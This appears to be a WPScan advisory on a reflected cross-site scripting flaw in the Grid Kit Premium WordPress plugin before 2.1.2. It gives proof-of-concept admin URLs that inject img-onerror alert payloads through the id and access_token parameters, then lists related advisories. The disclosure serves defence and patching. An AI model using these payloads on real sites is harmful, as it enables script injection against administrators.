Grid Kit Premium < 2.1.2 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameters before outputting them back in various pages, leading to Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=grid-kit&action=edit&id=</script><img src onerror=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=grid-kit-insta-feed&action=options&id=-1&type=insta_feed&access_token=</script><img src onerror=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=grid-kit-insta-feed&action=edit&id=2&type=insta_feed&access_token="><img+src+onerror%3Dalert(%2FXSS%2F)>

Affects Plugins

grid-kit-premium

Fixed in 2.1.2

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

5a717ebb-5381-4b9f-8325-0b3f9d48483f

Timeline

Publicly Published

2022-10-25 (about 3 years ago)

Added

2022-10-25 (about 3 years ago)

Last Updated

2023-06-16 (about 2 years ago)

Other

Published

Title

Published

2023-02-13

Title

WordPress Social Login and Register < 7.6.1 - Unauthenticated Arbitrary Content Deletion

Published

2022-05-09

Title

Team Members < 5.1.1 - Admin+ Stored Cross-Site Scripting

Published

2025-01-16

Title

WP Ultimate Reviews FREE <= 1.0.2 - Reflected Cross-Site Scripting

Published

2025-01-16

Title

RS Survey <= 1.0 - Reflected Cross-Site Scripting

Published

2024-03-25

Title

BuddyForms < 2.8.6 - Reflected Cross-Site Scripting via page